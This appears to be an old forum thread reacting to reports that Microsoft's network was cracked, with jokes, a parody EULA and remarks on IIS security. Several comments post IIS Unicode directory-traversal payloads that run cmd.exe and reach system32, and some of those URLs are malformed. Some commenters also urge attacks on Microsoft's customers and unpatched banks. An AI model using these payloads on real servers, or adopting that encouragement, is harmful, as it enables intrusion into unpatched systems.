Microsoft Cracked again?
Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld."
They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.
If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.
We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it
0 1 - just my two bits
Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populus. In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.
-------
Oh shit! I forgot to click "Post Anonymously"...
President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.
Jeff
I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.
http://target/scripts/..%c1%1c../winnt/system32
http://target/scripts/..%c0%9v../winnt/system32
http://target/scripts/..%c0%af../winnt/system32
http://target/scripts/..%c0%qf../winnt/system32
http://target/scripts/..%c1%8s../winnt/system32
http://target/scripts/..%c1%9c../winnt/system32
http://target/scripts/..%c1%pc../winnt/system32
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
Ever need an online dictionary?
1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.
Did I miss anything?